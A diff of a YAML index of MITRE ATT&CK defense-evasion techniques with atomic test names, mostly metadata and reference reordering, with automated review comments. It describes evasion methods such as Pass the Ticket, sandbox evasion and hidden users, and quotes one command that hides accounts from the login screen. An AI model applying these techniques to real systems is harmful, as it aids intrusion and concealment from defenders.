- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -17088,7 +17210,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -17107,8 +17229,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -17139,7 +17259,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -17169,12 +17289,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -17200,9 +17318,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
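Review bot: Replacing the 'Office 365' and 'Google Workspace' platforms with a single 'Office Suite' entry (x_mitre_version '2.1' to '2.2') changes which platform T1070 is filed under; anything that filters on the old platform names will silently drop this technique. Make sure every per-platform output is regenerated from the same data in this change and that 'Office Suite' is handled wherever platform names are enumerated or mapped.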
@@ -17233,9 +17350,8 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests:
- name: Indicator Removal using FSUtil
@@ -17282,7 +17398,7 @@ defense-evasion:
elevation_required: false
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -17302,6 +17418,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -17309,7 +17426,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -17325,34 +17441,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
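Review bot: The only substantive reference change in this hunk is `GentilKiwi Pass the Ticket` moving to a web.archive.org snapshot with a September 12, 2024 retrieval date, plus the added `revoked: false`, the 3.1.0 to 3.2.0 spec bump and the re-added `x_mitre_modified_by_ref`; the remaining lines are the external_references list being reordered (CERT-EU, Campbell, GentilKiwi, ADSecurity, Stealthbits). Sorting references by source_name in the generator would keep these hunks readable. Switching a dead blog URL to an archived copy is the right call; consider doing the same for the `http://defcon.org/...` Campbell link, which is still plain HTTP.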
@@ -17519,7 +17636,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests:
- name: Creating W32Time similar named service using schtasks
@@ -17640,7 +17756,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -17689,8 +17805,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -17828,7 +17942,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -17849,7 +17963,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests:
- name: Plist Modification
@@ -17935,7 +18048,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests:
- name: Mount ISO image
@@ -18099,7 +18211,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -18120,8 +18232,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -18182,11 +18292,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -18251,7 +18360,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests:
- name: Build Image On Host
@@ -18312,7 +18420,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -18356,8 +18464,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests:
- name: Portable Executable Injection
@@ -18447,7 +18553,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -18471,7 +18577,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -18562,7 +18667,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests:
- name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
@@ -18675,35 +18779,7 @@ defense-evasion:
default: Invoke-Mimikatz
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
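Review bot: Deleting the entire header block of T1497 (platforms, domains, contributors, marking refs, id, created, external_references) while adding only the new `modified` line makes this hunk read as a destructive change; the fields reappear in the two hunks that follow, but a reviewer has to cross-check them by hand. Same request as above for a stable key order in the generator. Also note `modified` jumps from 2022-04-25 to 2024-09-12 while x_mitre_version stays at '1.3' further down; if the only content change is the updated Deloitte reference, that is fine, but it is worth confirming.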
@@ -18715,6 +18791,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -18725,8 +18805,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -18736,9 +18822,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
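Review bot: The Deloitte Environment Awareness URL gains an `/edit` suffix (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) and a new retrieval date of September 13, 2024. Google Drive file links are normally shared with a `/view` path, and `/edit` is the editor path, so confirm the new URL resolves for an anonymous reader before replacing the previously working one. The rest of the hunk re-adds the id/created/external_references block removed in the earlier hunk, with the Unit 42 and Deloitte entries swapped in order.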
@@ -18791,7 +18896,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -18829,8 +18934,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
@@ -19107,62 +19210,68 @@ defense-evasion:
name: command_prompt
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
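Review bot: The meaningful change to T1480 is the new third description paragraph on user-agent based targeting, the `Trellix-Qakbot` reference that supports it, and the bump to x_mitre_version '1.2' / x_mitre_attack_spec_version 3.2.0; those lines are buried in a 60-line hunk that otherwise moves every key (`external_id: T1480` below `url`, both FireEye `url` fields below their `description`, the description block from bottom to top). Separately, the new paragraph describes a server-side guardrail (serving a payload only to a matching user-agent) while the unchanged `x_mitre_detection` still covers only host-side discovery processes; that gap is upstream's, but it may be worth a follow-up note.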
@@ -19220,7 +19329,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests:
- name: Named pipe client impersonation
@@ -19385,7 +19493,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -19410,8 +19518,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -19472,7 +19578,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -19545,7 +19650,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -19574,7 +19679,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests:
- name: Create Hidden User using UniqueID < 500
@@ -19706,11 +19810,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -19795,7 +19898,6 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests:
- name: Disable history collection
@@ -20068,7 +20170,7 @@ defense-evasion:
'
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -20143,45 +20245,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
